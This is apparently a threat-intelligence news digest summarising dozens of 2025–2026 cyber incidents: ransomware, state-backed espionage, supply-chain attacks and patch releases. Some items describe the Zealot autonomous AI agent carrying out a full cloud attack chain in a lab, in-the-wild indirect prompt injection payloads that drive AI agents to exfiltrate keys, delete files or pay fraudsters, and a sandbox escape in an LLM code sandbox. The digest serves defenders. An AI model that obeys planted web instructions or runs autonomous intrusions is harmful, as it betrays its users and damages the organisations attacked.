Between November 2023 and October 2025, cyber-attacks on schools and universities worldwide rose 63% year-over-year, driven by geopolitical tensions, ransomware, and hacktivism, according to threat intelligence analyzed by Quorum Cyber. Data breaches increased 73%, hacktivist activity 75%, and ransomware incidents 21% across 67 countries. Research-intensive institutions face targeted theft of AI, quantum, and advanced materials data, while hacktivist campaigns—including Iranian-affiliated actors—conduct DDoS, defacement, and data-leak operations.

Unit 42 at Palo Alto Networks has demonstrated an autonomous AI agent, named Zealot, capable of executing end-to-end attacks against a Google Cloud Platform (GCP) environment with minimal human oversight. Zealot operated under an open-ended objective to exfiltrate sensitive data from a targeted BigQuery dataset in an isolated GCP lab environment. Using a supervisor-agent architecture with three specialized sub-agents, the system autonomously performed reconnaissance, exploited a web application to steal credentials, escalated privileges, and extracted data while improvising evasion tactics such as injecting SSH keys for persistence. The findings underscore a shift toward AI-driven offensive operations, revealing that current human-centric detection paradigms may be insufficient to counter machine-speed intrusions.

Security researchers demonstrated a self-directed AI system capable of executing a full cloud attack chain from initial access to data exfiltration in under three minutes, using only a single natural-language prompt and exploiting existing misconfigurations. The autonomous multi-agent framework, named Zealot, autonomously chained reconnaissance, exploitation, privilege escalation, and data theft by leveraging common cloud weaknesses such as server-side request forgery, exposed metadata services, and permissive storage bucket policies. The experiment, conducted in a deliberately misconfigured Google Cloud Platform environment, highlights that current large language models (LLMs) can automate complex attack sequences faster than human defenders can respond, reducing the operational window for mitigation to minutes rather than hours or days.

Security researchers reported 10 new indirect prompt injection (IPI) payloads being exploited in-the-wild, enabling threat actors to execute malicious instructions via web content poisoning. The attacks target AI agents that process web content for summarization, retrieval-augmented generation (RAG), metadata extraction, ad review, SEO analysis, or moderation. Impact scales with agent privileges, from low-risk summarizers to high-impact agentic tools capable of emailing, executing shell commands, or processing payments. Payloads observed include content suppression, attribution hijacking, forced file deletion, API key exfiltration, and financial fraud via embedded payment instructions.

A previously undocumented China-aligned APT group named GopherWhisper has compromised at least 12 systems across Mongolian governmental institutions using a suite of Go-based backdoors and loaders. The threat actor abuses legitimate services—Discord, Slack, Microsoft 365 Outlook, and file.io—for command-and-control (C2) communications and data exfiltration. Initial access vectors remain undisclosed, but post-compromise activity includes lateral movement, data collection, and persistent remote access. Operational activity aligns with China Standard Time, with C2 traffic primarily occurring during standard working hours, suggesting human operator involvement.

Apple released iOS/iPadOS updates (26.4.2, 18.7.8) to remediate CVE-2026-28950, a logging issue that retained deleted message previews in system cache despite user deletion and application uninstallation. The flaw allowed forensic recovery of Signal chat previews via cached notifications, affecting iPhone and iPad models from iPhone XR through iPhone 16 series and iPad mini (5th gen) to iPad Pro 13-inch (M4). Apple did not disclose exploitation status but subsequent reporting indicated the flaw was exploited by law enforcement in the Prairieland case to extract deleted Signal messages. Apple’s update improves data redaction to prevent notification previews from persisting after deletion or uninstallation.

The UK National Cyber Security Centre (NCSC) has officially designated passkeys as the preferred consumer authentication method, urging adoption by businesses and the public. Previously reserved for scenarios where passkeys are unavailable, passwords are now deprecated as a primary login option. The endorsement follows a year-long collaboration with the FIDO Alliance and observed success in deployments such as the NHS. The move aims to reduce reliance on passwords by promoting passkeys, which leverage FIDO2 and WebAuthn standards for phishing-resistant, biometric, or device-based authentication. The UK government has also committed to rolling out passkeys across all public digital services.

A Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection vulnerability in end-of-life D-Link DIR-823X routers, to recruit devices into a botnet. The flaw enables unauthenticated remote code execution (RCE) via a POST request to the /goform/set_prohibiting endpoint, allowing attackers to download and execute a Mirai variant named "tuxnokill" that supports multiple architectures. The campaign was detected by Akamai SIRT in early March 2026, marking the first observed in-the-wild exploitation despite the vulnerability’s public disclosure 13 months prior. The affected firmware versions (240126 and 24082) were end-of-life in November 2024, and no patches are expected from D-Link. The threat actor also exploits vulnerabilities in TP-Link (CVE-2023-1389) and ZTE routers using the same attack pattern, deploying Mirai payloads consistently across targets.

TeamPCP has escalated its multi-vector CanisterWorm campaign into a geopolitically targeted operation, compromising trusted PyPI packages (LiteLLM versions 1.82.7–1.82.8 and Telnyx versions 4.87.1–4.87.2) to deliver credential-stealing malware that harvests SSH keys, cloud credentials, Kubernetes secrets, database credentials, cryptocurrency wallets, TLS/SSL private keys, and bash history files. The malware exfiltrates stolen data to attacker-controlled infrastructure and establishes persistent backdoors, with evidence linking TeamPCP to the Vectr ransomware group for follow-on operations. The campaign began as a supply-chain attack involving 47 compromised npm packages and escalated to include GitHub repository hijacking (e.g., Aqua Security), Docker Hub compromise, and direct targeting of CI/CD pipelines via GitHub Actions workflows (e.g., Checkmarx, Trivy). Recent compromises of LiteLLM and Telnyx demonstrate rapid iteration and maturation of supply-chain attack methodology, while destructive payloads targeting Iranian systems in Kubernetes environments (e.g., time-zone/locale-based wipers) highlight the group’s geopolitical alignment. The LiteLLM compromise specifically turned developer endpoints into systematic credential harvesting operations, with malware activating during installation/updates and cascading through transitive dependencies (e.g., dspy, opik) to affect organizations that never directly used LiteLLM. A coordinated attack on Checkmarx ecosystems has been discovered, including malicious images pushed to the official "checkmarx/kics" Docker Hub repository (v2.1.20, alpine overwritten; v2.1.21 introduced) and infected Visual Studio Code extensions (1.17.0, 1.19.0) that executed remote addons via Bun without user consent. The malware collected and exfiltrated sensitive data from infrastructure-as-code scans, exposing credentials in Terraform, CloudFormation, or Kubernetes configurations. Techniques and exfiltration infrastructure (e.g., ICP canister cjn37-uyaaa-aaaac-qgnva-cai.raw.icp0.io) resemble TeamPCP's CanisterWorm operations, though attribution remains unconfirmed. The Docker Hub repository has been archived, and affected organizations must remediate potentially compromised secrets.

Threat actors are increasingly leveraging legitimate, native system tools across both Windows and macOS environments to conduct attacks, achieving lateral movement, privilege escalation, and persistence while evading detection. Analysis of over 700,000 high-severity incidents indicates that 84% now involve abuse of trusted utilities—practices known as Living off the Land (LOTL). This shift reduces reliance on malware and exploits, exploiting operational blind spots created by necessary administrative tools. Recent research from Cisco Talos highlights the expansion of LOTL techniques to macOS native features such as Remote Application Scripting (RAS), Spotlight metadata, and Apple Events, enabling covert execution, persistence, and lateral movement. More than 45% of organizations now use macOS in enterprise settings—often holding sensitive credentials, cloud access, and source code—making the platform a high-value target. Attackers abuse RAS to issue remote commands without triggering shell-based monitoring, embed malicious payloads in Finder comments stored as Spotlight metadata, and leverage protocols like SMB, Netcat, Git repositories, TFTP, and SNMP for covert data transfer and movement. The technique remains the dominant intrusion vector, progressing undetected until significant compromise occurs, particularly due to limited visibility into macOS-native behaviors and reliance on legitimate system processes.

Spanish law enforcement dismantled a long-running Spanish-language manga piracy platform active since 2014, resulting in four arrests and the seizure of assets valued at $4.7M in advertising revenue and over $470,000 in cryptocurrency. The platform provided unauthorized access to copyrighted manga works, monetized primarily through aggressive pop-up advertisements—including pornographic ads—exposed to millions of monthly users globally, many of whom were minors. A coordinated raid in Almería, Spain, uncovered a complex technological infrastructure supporting the operation and revealed an in-progress plan to migrate the platform to a new domain to evade enforcement.

The UK National Cyber Security Centre (NCSC) has publicly released SilentGlass, a plug-and-play hardware device designed to block malicious or unexpected content at the HDMI and DisplayPort interfaces between source devices and monitors. Deployed first on UK government estates and now available globally, SilentGlass is positioned as a low-cost mitigation against attacks leveraging compromised or malicious video streams to exfiltrate data, inject payloads, or pivot into protected networks. The device is approved for use in high-threat environments and is manufactured by Goldilock Labs in partnership with Sony UK.

A North Korean state-aligned actor has transformed fake job recruitment scams into a self-propagating supply-chain attack dubbed "Contagious Interview" that infects developer workstations and then silently propagates malicious code through cloned repositories. The campaign, attributed to Void Dokkaebi (aka Famous Chollima), abuses legitimate development workflows by luring developers with fake interviews at crypto and AI firms, then delivering malware via malicious VS Code tasks, hidden .vscode folders, or bundled payloads in fonts/images. Once a developer commits the infected code to GitHub/GitLab/Bitbucket, the repository becomes a Trojan horse that spreads the infection to downstream contributors and forked projects, creating a worm-like chain reaction across the software supply chain. Attackers stage payloads on blockchain networks (Tron, Aptos, Binance Smart Chain) to evade takedowns and target developers’ credentials, crypto wallets, CI/CD pipelines, and production infrastructure. In March 2026 alone, over 750 repositories, 500 VS Code task configurations, and 101 instances of commit-tampering tools were identified as infected, with markers found in repositories used by DataStax and Neutralinojs.

The UK government announced a £90 million ($120 million) investment in cybersecurity resilience, targeting small and medium-sized enterprises (SMEs) to bolster national cyber defense. The funding, revealed at the NCSC's CYBERUK conference on April 22, aims to support SMEs in implementing the Cyber Essentials standard and encourages broader adoption of cybersecurity best practices. A new Cyber Resilience Pledge will be introduced in summer 2026, requiring signatories to elevate cybersecurity to board-level responsibility, enroll in the NCSC’s Early Warning service, and mandate Cyber Essentials certification across supply chains.

Cybercriminal ecosystems have professionalized direct voice fraud ('vishing') via Caller-as-a-Service (CaaS) operations, structuring fraud as a scalable, role-divided business with real-time supervision, standardized recruitment, and performance-based compensation. These models leverage compromised data sources and human-centered social engineering to extract sensitive information or funds, often targeting English-speaking victims with high psychological pressure tactics. Operational characteristics include cryptocurrency-based recruitment incentives, OPSEC requirements, and live call monitoring to ensure script adherence and maximize conversion rates.

A widespread stealth phishing campaign employing emails with missing subject lines (silent/null subject phishing) has escalated in Q1 2026, targeting executives and privileged users to facilitate initial access and potential lateral movement. Attackers bypass traditional email defenses by omitting subject lines to evade keyword-based and behavioral detection, while leveraging malicious links, QR codes, and legitimate remote monitoring and management (RMM) software such as Datto RMM under deceptive filenames. The campaign has grown by 13.9% between January and February 2026 and a further 7.0% in March, with sustained momentum projected. Impact includes credential harvesting, data exfiltration, and persistence within enterprise environments.

Microsoft will deploy an Efficiency Mode for Microsoft Teams targeting Windows and Mac desktops in May 2026, designed to enhance application responsiveness on hardware-constrained systems by dynamically adjusting video resolution and app behavior. The feature is enabled by default on eligible devices, with users able to opt out via application settings. Additionally, Microsoft will introduce new security reporting tools starting in June 2026, including end-user reporting for suspicious external users and a centralized Security Detection Report in the Teams admin center to surface messaging security detections such as impersonation attempts, malicious URLs, and weaponizable file types. Teams will also automatically tag third-party bots in meeting lobbies beginning next month to allow organizers to manage bot participation.

A former ransomware negotiator pleaded guilty to conspiring with the BlackCat (ALPHV) ransomware group to extort multiple US victims between April 2023 and November 2023. Angelo Martino, 41, of Land O’Lakes, Florida, worked as a negotiator for incident response firm Digital Mint while secretly collaborating with BlackCat affiliates. He provided internal negotiation details, including insurance policy limits and victim positions, to maximize ransom demands. Martino also actively participated in deploying ransomware as an affiliate, alongside Ryan Goldberg of Georgia and Kevin Martin of Texas. Authorities seized $10 million in assets from Martino, including cryptocurrency, luxury vehicles, a food truck, and a fishing boat. Court documents indicate ransoms paid to the trio totaled at least $69 million across victims including a hospitality firm ($16.5m), a financial services firm ($25.7m), and a non-profit ($26.8m). Martino’s sentencing is scheduled for July 9, 2026, with a maximum penalty of 20 years imprisonment.

A previously undocumented file wiper malware named Lotus Wiper has been deployed in a destructive campaign targeting the energy and utilities sector in Venezuela, with activity spanning late 2025 and early 2026. The wiper systematically destroys system recovery mechanisms, overwrites physical drive contents, and deletes files across mounted volumes, rendering affected systems inoperable. No ransom or extortion demands were observed, indicating a non-financial motive. The attack chain involves multi-stage batch scripts that disable defenses, enumerate domain users, disable cached logins, disable network interfaces, and prepare the environment for wiper execution using native Windows utilities such as diskpart, robocopy, and fsutil.

On January 31, 2026, researchers disclosed an exposed database in Moltbook, a social network for AI agents, which leaked 35,000 email addresses and 1.5 million agent API tokens across 770,000 active agents. The database also contained plaintext third-party credentials, including OpenAI API keys, shared between agents in private messages, enabling attackers to hijack AI agents and their associated service integrations through unintended cross-application trust chains. The incident highlights the risk of "toxic combinations" of permissions, where AI agents, MCP servers, or OAuth integrations bridge multiple applications without explicit oversight from any single application owner, creating unauthorized lateral trust pathways that bypass conventional SaaS access reviews. These bridges form at runtime and are invisible to single-app governance, allowing credential exfiltration and command-and-control abuse when combined with weak token hygiene and runtime drift.

Microsoft has identified a regression in the Microsoft Graph API as the root cause of intermittent failures in Universal Print printer share creation, affecting Microsoft 365 customers using the cloud-based print management service. The issue, tracked as UP1287359, triggers "Sharing Print Failed" errors when users attempt to create printer shares with the "Allow all users in my organization" toggle enabled or when specific users or groups are selected. The underlying cause is a code change in Graph API that increased Entra ID directory replication latency, exposing a pre-existing race condition in the share creation flow. This disrupts retry logic, preventing share operations from completing as expected.

A Belarus-based software platform named ProxySmart has been identified as the operational backbone for over 90 SIM farms across 17 countries, enabling large-scale cybercrime and evasion activities. The end-to-end platform supports device management, automated IP rotation via cellular reconnection, remote control, and network fingerprint spoofing, marketed as a turnkey ‘SIM Farm as a Service’ solution accessible to non-technical operators. The infrastructure is used to facilitate activities including smishing, premium-rate fraud, bot sign-ups, OTP interception, and potential nation-state disinformation campaigns.

A previously undocumented Linux variant of the GoGra backdoor, attributed to the state-backed Harvester espionage group, has been identified using legitimate Microsoft Graph API and Outlook mailboxes for stealthy command-and-control (C2) communications. The malware is delivered via fraudulent ELF executables masquerading as PDF files, establishes persistence via systemd and XDG autostart under the guise of the Conky system monitor, and retrieves base64-encoded, AES-CBC encrypted commands from a specific Outlook folder named “Zomato Pizza” with subject lines prefixed “Input.” Execution results are similarly encrypted and returned to the operator via reply emails labeled “Output,” with original command emails deleted to reduce forensic traces. The campaign targets telecommunications, government, and IT organizations in South Asia, indicating an expansion of Harvester’s operational scope and toolset to include Linux systems.

The UK faces a sustained and evolving cyber threat environment characterized by nation-state espionage, hybrid operations, and disruptive campaigns as AI-driven technological advancements exacerbate attack surfaces. Richard Horne, CEO of the NCSC, warned at CYBERUK 2026 that geopolitical tensions and rapid AI adoption are converging to create a ‘perfect storm’ of cyber risk. Nation-state actors—particularly China, Russia, and Iran—are employing increasingly sophisticated tactics, with China’s operations noted for their stealth and focus on edge infrastructure such as routers and VPNs. Russian threat activity is becoming more disciplined and militarized, while Iran is using cyber means to target British individuals perceived as regime threats, including via social media and destructive operations like the March 2025 Handala wiper attack on a UK NHS supplier. Despite a steady volume of nationally significant incidents, UK organizations are deemed underprepared due to budget constraints, immature security controls, and limited visibility, raising concerns about resilience against sustained state-sponsored assaults.

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers. Security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads. Beukema documented four previously unknown techniques for manipulating Windows LNK shortcut files to hide malicious targets from users inspecting file properties. The most effective variants use forbidden Windows path characters, such as double quotes, to create seemingly valid but technically invalid paths, causing Explorer to display one target while executing another. The most powerful technique identified involves manipulating the EnvironmentVariableDataBlock structure within LNK files to display a fake target in the properties window while actually executing PowerShell or other malicious commands. Microsoft declined to classify the EnvironmentVariableDataBlock issue as a security vulnerability, arguing that exploitation requires user interaction and does not breach security boundaries. Microsoft Defender has detections in place to identify and block this threat activity, and Smart App Control provides an additional layer of protection by blocking malicious files from the Internet. Beukema released "lnk-it-up," an open-source tool suite that generates Windows LNK shortcuts using these techniques for testing and can identify potentially malicious LNK files by predicting what Explorer displays versus what actually executes. CVE-2025-9491 was widely exploited by at least 11 state-sponsored groups and cybercrime gangs. Mustang Panda has expanded operations with a new LOTUSLITE backdoor variant targeting India's banking sector and South Korean/U.S. policy circles. The variant uses CHM files embedding malicious payloads, dynamic DNS C2 servers, and DLL side-loading to deliver remote shell access, file operations, and session management capabilities for espionage purposes.

A critical sandbox escape vulnerability (CVE-2026-5752, CVSS 9.3) in Cohere AI’s Terrarium Python sandbox allows arbitrary code execution with root privileges on the host process through JavaScript prototype chain traversal in the Pyodide WebAssembly environment. Terrarium, a Docker-deployed sandbox for untrusted Python code, enables users to submit or generate code via LLMs and runs on Pyodide, supporting standard Python packages. Successful exploitation breaks out of the sandbox to execute system commands as root within the container, access sensitive files such as /etc/passwd, interact with other services on the container network, and potentially escape the container to escalate privileges. The flaw requires local access but no user interaction or special privileges, and no patch is expected as the project is no longer maintained.

Over 1,300 Microsoft SharePoint servers remain unpatched against CVE-2026-32201, a spoofing vulnerability exploited as a zero-day and still actively abused in attacks. The flaw impacts SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition, enabling threat actors without privileges to perform network spoofing via improper input validation. Exploitation can compromise confidentiality and integrity but does not restrict resource access. The issue was patched in April 2026 Patch Tuesday, added to CISA’s Known Exploited Vulnerabilities Catalog, and mandated for patching by U.S. federal agencies within two weeks. Fewer than 200 systems have been updated since the patch release.

France Titres (Agence nationale des titres sécurisés, ANTS), the government agency under France’s Ministry of the Interior responsible for issuing identity documents, disclosed a security incident on April 15, 2026, affecting its ants.gouv.fr portal. An unidentified threat actor advertised a sale of up to 19 million records on April 16, claiming access to full names, contact details, birth data, home addresses, account metadata, and civil status information. ANTS confirmed exposure of login IDs, names, emails, dates of birth, unique account identifiers, and partial address and phone data for an undisclosed number of individuals. While ANTS states the incident does not enable unauthorized access to its portals, exposed data heightens phishing and social engineering risks. The agency is coordinating with CNIL, the Paris Public Prosecutor, and ANSSI and has advised vigilance against suspicious communications purportedly from ANTS.

Microsoft Defender is being actively abused in the wild using three proof-of-concept exploits—RedSun, BlueHammer (CVE-2026-33825), and UnDefend—released by researcher "Nightmare-Eclipse" after alleged poor responses from Microsoft Security Response Center (MSRC). RedSun and BlueHammer enable SYSTEM-level privilege escalation on fully patched Windows 10, 11, and Server 2019+ systems with Defender enabled, while UnDefend degrades Defender’s threat detection capabilities without triggering alerts. Attackers are staging binaries in low-noise directories and manually enumerating privileges before exploitation, reflecting targeted hands-on intrusions. Microsoft patched BlueHammer in April updates but has not addressed RedSun or UnDefend, which operate via separate flaws in Defender’s privileged file handling workflows.

Microsoft’s multi-month Patch Tuesday campaign continues with the April 2026 release addressing 167 security vulnerabilities in Windows and related software, including two actively exploited zero-days (CVE-2026-32201 in SharePoint Server and CVE-2026-33825 in Microsoft Defender). Nearly 60% of the patched flaws are elevation-of-privilege bugs, marking the highest proportion in eight months, while eight Critical vulnerabilities were addressed, including unauthenticated remote code execution flaws in Windows IKE Service Extensions (CVE-2026-33824, CVSS 9.8) and secure tunneling components (CVE-2026-33827, CVSS 8.1). Following the April updates, threat actors are now exploiting two additional unpatched Microsoft Defender zero-days—RedSun and UnDefend—alongside the patched CVE-2026-33825 (BlueHammer). Exploitation activity has been observed since April 10, 2026, with RedSun and UnDefend PoCs deployed on April 16, 2026, featuring hands-on-keyboard techniques such as whoami /priv, cmdkey /list, and net group commands. Huntress confirmed real-world exploitation and took steps to isolate compromised systems to prevent post-exploitation damage. Threat actors have also been observed chaining these flaws with other vulnerabilities to achieve full endpoint control. Microsoft issued out-of-band emergency patches for CVE-2026-40372, a critical ASP.NET Core privilege escalation vulnerability in the ASP.NET Core Data Protection cryptographic APIs. The flaw enables unauthenticated attackers to gain SYSTEM privileges by forging authentication cookies, stemming from a regression in Microsoft.AspNetCore.DataProtection 10.0.0-10.0.6 packages. Microsoft recommends updating to version 10.0.7 and rotating the DataProtection key ring to fully remediate. The April updates were distributed through Windows 11 cumulative updates KB5083769 (for versions 25H2/24H2) and KB5082052 (for 23H2), changing build numbers to 26200.8246 (25H2), 26100.8246 (24H2), and 22631.6936 (23H2). Windows 10 Enterprise LTSC and ESU participants received the April fixes via KB5082200, updating to build 19045.7184 (Windows 10) or 19044.7184 (Windows 10 Enterprise LTSC 2021).